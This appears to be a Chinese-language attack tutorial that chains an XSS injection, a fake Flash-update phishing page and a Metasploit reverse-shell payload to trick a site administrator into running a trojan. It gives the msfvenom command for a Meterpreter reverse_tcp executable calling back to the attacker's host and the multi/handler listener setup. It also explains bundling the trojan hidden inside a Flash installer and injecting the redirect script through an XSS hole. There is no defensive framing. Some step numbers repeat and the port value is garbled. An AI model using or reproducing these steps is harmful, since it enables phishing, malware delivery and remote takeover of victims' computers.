- 先去注册账号xssaq.com
- 注册成功后,点击公共模块
- 将其中的代码重新放在1.js中,并修改下方标红。将他放在根目录下。
4.生成钓鱼网站,以flash为例。下载下面的项目并将其源码文件部署在网站根目录
https://github.com/crow821/crowsec/tree/master/crowsec FakeFlash
- 打开kali,用MSF生成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=44 44 -f exe > shell.exe
- 开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7 set lport 4444
run
6.将shell.exe和falsh安装包压缩成一个
6.去找一个xss漏洞提交1.js,这样管理员登录就会出问题
7.模拟登录管理员账户后会有以下页面
8.当他点击就会跳转到我的flash,这时候他点击立即下载就会上当
9.当他运行该文件就会出错
因为木马文件之前选择的是隐藏并且第一个,所以我们的木马会在这个安装界面之前
10.去kali:sysinfo